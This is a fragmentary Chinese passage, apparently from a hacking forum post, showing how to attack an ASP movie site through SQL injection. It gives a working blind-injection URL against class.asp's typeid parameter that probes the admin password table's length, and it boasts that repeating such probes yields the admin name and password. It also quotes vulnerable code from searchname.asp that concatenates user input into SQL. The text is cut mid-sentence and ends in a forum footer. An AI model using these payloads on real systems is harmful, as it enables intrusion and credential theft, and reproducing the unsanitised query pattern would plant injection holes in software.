用 户:">
用 户:
该栏目没有任何电影
"呵呵,又来了,typeid未经任何检测。看下面的代码: http://127.0.0.1/class.asp?typeid=动作片%20and%201=(select%20id%20from%20password%20where%20len(name)>6)%20and%201 正常返回页面,那么管理员的密码长度大于六了。哈哈。 不用再说了。重复类似代码,管理员名和密码又能到手了。。。。。还有/user/searchname.asp, 看代码: <% if request("searchuser")<>"" then set rs=server.createobject("adodb.recordset") sql="select userid from users where userid="&request("userid")&"" rs.open sql,conn,1,2 if rs.eof then response.write "欢迎光临 黑色海岸线论坛 (http://bbs.thysea.com/) | Powered by Discuz! 7.2 |